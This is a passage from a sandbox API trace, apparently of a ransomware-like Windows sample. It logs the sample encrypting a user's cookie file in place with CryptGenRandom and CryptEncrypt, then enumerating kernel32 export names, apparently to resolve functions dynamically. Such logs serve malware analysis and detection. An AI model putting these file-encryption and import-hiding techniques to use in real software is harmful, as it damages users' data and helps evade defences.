HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt" [0079.588] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.589] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=104) returned 1 [0079.589] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.589] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.589] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.589] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.589] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.590] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.590] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.591] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.591] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.591] CloseHandle (hObject=0x464) returned 1 [0079.592] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.592] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.592] CloseHandle (hObject=0x0) returned 0 [0079.592] CloseHandle (hObject=0x460) returned 1 [0079.593] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.593] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.594] GetTickCount () returned 0x114c63c [0079.594] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.594] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.594] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.594] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.594] lstrlenA (lpString="kernel32.dll") returned 12 [0079.595] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.595] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.595] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.595] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.595] lstrlenA (lpString="ADDATOMA") returned 8 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.595] lstrlenA (lpString="ADDATOMW") returned 8 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.595] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.595] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.595] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.595] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.595] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.595] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.595] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.595] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.595] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.595] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.596] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.596] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.596] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.596] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.596] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.596] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.596] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.596] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.596] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.596] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.596] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.596] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.596] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.596] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.596] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.596] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.596] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.596] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.597] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.597] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.597] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.597] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.597] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.597] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.597] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.597] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.597] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.597] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.597] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.597] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.597] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.597] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.597] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.597] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.597] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.597] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.597] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.598] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.598] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.598] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.598] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.598] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.598] lstrlenA (lpString="BEEP") returned 4 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.598] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.598] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.598] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.598] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.598] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.598] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.598] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.598] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.598] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.598] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.598] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.598] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.599] lstrlenA (lpString="CANCELIO") returned 8 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.599] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.599] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.599] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.599] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.599] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.599] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.599] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.599] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.599] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.599] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.599] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.599] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.599] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.599] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.599] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.599] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.599] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.599] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.600] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.600] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.600] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.600] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.600] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.600] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.600] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.600] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.600] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.600] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.600] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.600] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.600] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.600] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.600] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.600] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.600] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.600] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.600] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.601] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.601] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: 